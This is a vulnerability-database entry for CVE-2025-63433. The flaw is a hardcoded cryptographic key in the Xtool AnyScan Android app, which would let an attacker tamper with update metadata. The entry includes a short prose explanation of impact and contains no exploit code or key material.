CVE-2025-63433
BaseFortify
Publication date: 2025-11-24
Last updated on: 2025-11-28
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| xtooltech | xtool_anyscan | to 4.40.40 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-798 | The product contains hard-coded credentials, such as a password or cryptographic key. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in the Xtooltech Xtool AnyScan Android Application version 4.40.40 and earlier. The application uses a hardcoded cryptographic key and initialization vector (IV) within its code to decrypt update metadata. Because the key is static and embedded in the app, an attacker who can intercept network traffic can use this key to decrypt, modify, and then re-encrypt the update manifest. This manipulation allows the attacker to trick the application into downloading and installing a malicious update package.
How can this vulnerability impact me? :
If exploited, this vulnerability can allow an attacker to deliver malicious updates to the application by intercepting and altering the update metadata. This could lead to the installation of malicious software on the device, potentially compromising the device's security, data integrity, and user privacy.